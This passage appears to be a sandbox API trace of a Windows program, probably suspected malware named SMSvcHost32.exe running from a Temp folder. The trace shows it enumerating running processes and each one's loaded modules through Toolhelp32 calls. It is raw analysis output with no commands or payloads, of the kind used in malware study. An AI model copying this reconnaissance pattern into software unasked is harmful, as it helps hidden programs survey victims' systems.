	[0106.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.931] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.931] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.932] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.933] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.934] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.935] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.935] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.936] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 1
	[0106.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.937] Module32NextW (hSnapshot=0x88c, lpme=0x20af280) returned 0
	[0106.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 11
	[0106.938] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0106.939] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xcf4) returned 0xffffffff
	[0106.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11
	[0106.941] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe6c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 1
	[0106.942] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x934) returned 0x890
	[0106.978] Module32FirstW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.979] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.980] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.980] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.981] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.982] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.983] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.984] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.985] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.986] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.987] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.987] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.988] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.989] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0106.990] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.007] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.008] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.009] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.010] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.011] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.011] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.012] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.013] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.014] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.015] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.016] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.016] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.017] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.018] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.019] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.020] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.021] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.022] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.023] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.025] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.026] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.027] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.028] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.029] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.030] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.031] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.033] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.034] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.035] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.036] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.037] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.038] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.039] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.054] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.055] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.056] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.057] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.058] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.059] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.060] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.061] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.062] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.063] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.064] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.065] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.066] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.067] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.068] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.069] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.070] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.071] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.072] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.073] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.074] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.075] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.076] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.077] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.078] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.079] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.080] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 0
	[0107.081] Module32FirstW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 53
	[0107.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 16
	[0107.082] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.083] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0107.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0107.084] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0107.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0107.085] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\advapi32.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="advapi32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="advapi32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.086] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.086] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.109] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.110] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.111] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0107.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0107.112] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.113] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\dsprop.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\dsprop.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dsprop.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dsprop.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.115] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.116] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.123] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SHELL32.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SHELL32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHELL32.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.124] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 33
	[0107.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cfgmgr32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cfgmgr32.dll", lpUsedDefaultChar=0x0) returned 13
	[0107.125] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\windows.storage.dll", lpUsedDefaultChar=0x0) returned 40
	[0107.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="windows.storage.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows.storage.dll", lpUsedDefaultChar=0x0) returned 20
	[0107.126] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.127] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
	[0107.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\shlwapi.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="shlwapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="shlwapi.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.128] Module32NextW (hSnapshot=0x890, lpme=0x20af280) returned 1
